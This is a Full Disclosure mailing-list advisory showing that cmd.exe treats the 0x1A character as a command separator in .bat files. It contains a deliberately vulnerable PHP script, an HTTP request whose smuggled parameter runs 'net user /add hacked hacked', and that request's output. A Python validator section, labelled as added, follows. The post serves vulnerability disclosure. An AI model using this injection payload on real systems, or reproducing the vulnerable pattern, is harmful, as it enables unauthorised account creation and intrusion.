Message-ID: <CAN78G5q6odH1BhOEgwpRROXg8ethwSkS8eCruT+Bn-+Jr+uk4w@mail.gmail.com>
Date: Fri, 11 Nov 2016 21:49:07 +0000
From: Julian Horoszkiewicz <ewilded@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Unexpected behavior of cmd.exe while processing .bat files
 leads to potential command injection vulnerabilities

Unexpected behavior of cmd.exe while processing .bat files leads to
potential command injection vulnerabilities
Tested on: Windows 7, Windows 10
Author: Julian Horoszkiewicz

It was discovered that cmd.exe, when processing .bat files, treats the
ASCII substitute character (code 26, 0x1A) as a command separator (like & or |).
This opens the way for unexpected command injection vulnerabilities in
applications which generate .bat files based on user input, as most
application-level input sanitisers against command injection do not filter
this character.

PoC:
Let's assume the following PHP script (note the use of the well-known
escapeshellcmd() function, widely regarded as a safe way to sanitise user
input before using it as part of a command):
<?php
    // Deliberately vulnerable PoC (as in the original post): user input is
    // concatenated into a command, passed through escapeshellcmd(), written
    // to a .bat file and then executed by cmd.exe.
    $command = 'dir '.$_POST['dir'];
    $escaped_command = escapeshellcmd($command);
    file_put_contents('out.bat',$escaped_command);
    system('out.bat');
?>

Let's send a request containing "." as the parameter to the hardcoded "dir"
command, followed by another command, using %1a (the URL-encoded substitute
character, 0x1A) as the command separator:
POST /escape_shell_cmd.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101
Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

dir=.%1anet user /add hacked hacked


The response:
HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP
Content-Length: 977
Connection: close
Content-Type: text/html; charset=UTF-8

C:\wamp64\www>dir .
 Volume in drive C has no label.
 Volume Serial Number is 22C1-AD4C

 Directory of C:\wamp64\www

24.07.2016  17:22    <DIR>          .
24.07.2016  17:22    <DIR>          ..
[...]

C:\wamp64\www>net user /add hacked hacked
Command executed successfully.

To double-check, we look up the new user from the command line:

C:\Users\win>net user hacked
User name                  hacked
Full name
[...]

So, it seems that every piece of software generating .bat files from user
input is potentially vulnerable; the issue does not pertain to PHP and
escapeshellcmd() specifically, but rather to cmd.exe itself.
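As an added example (not code from the original post), the following Python models the Windows behaviour of PHP's escapeshellcmd() as described in the PHP manual (the listed metacharacters, plus % and !, are replaced by a space; quote handling is omitted), shows that the 0x1A byte from the PoC passes through it untouched, and contrasts it with a control-character check and an allow-list validator a defender can apply before writing user input into a .bat file. The function names, the metacharacter set and the allow-list pattern are my own assumptions, not part of any library.

```python
import re

# Characters escapeshellcmd() acts on per the PHP manual, plus % and !,
# which it also handles on Windows. On Windows each is replaced by a space.
# Note that 0x1A is absent from this list.
_ESCAPESHELLCMD_CHARS = set('&#;`|*?~<>^()[]{}$\\\n\xff%!')


def model_escapeshellcmd_windows(s: str) -> str:
    """Approximation of escapeshellcmd() on Windows (quote handling omitted)."""
    return ''.join(' ' if ch in _ESCAPESHELLCMD_CHARS else ch for ch in s)


# cmd.exe metacharacters a .bat generator should never accept from users.
_CMD_META = set('&|<>^%!"()')


def contains_bat_separator(s: str) -> bool:
    """True if s contains any C0 control character (0x00-0x1F, which covers
    the 0x1A substitute character), DEL, or a cmd.exe metacharacter."""
    return any(ord(ch) < 0x20 or ord(ch) == 0x7F or ch in _CMD_META for ch in s)


def is_safe_bat_argument(s: str) -> bool:
    """Allow-list check for a single path-like argument destined for a .bat
    file: only letters, digits, '.', '_', '\\', ':' and '-' are accepted."""
    return re.fullmatch(r'[A-Za-z0-9._\\:-]+', s) is not None


# Constructed sample: the PoC parameter from the post, with %1a decoded.
PAYLOAD = '.\x1anet user /add hacked hacked'

if __name__ == '__main__':
    escaped = model_escapeshellcmd_windows(PAYLOAD)
    print('unchanged by escapeshellcmd:', escaped == PAYLOAD)     # True
    print('control char detected:', contains_bat_separator(escaped))  # True
    print('allow-list accepts ".":', is_safe_bat_argument('.'))       # True
    print('allow-list accepts payload:', is_safe_bat_argument(PAYLOAD))  # False
```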
More on alternative command injection payloads:
https://github.com/ewilded/shelling

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
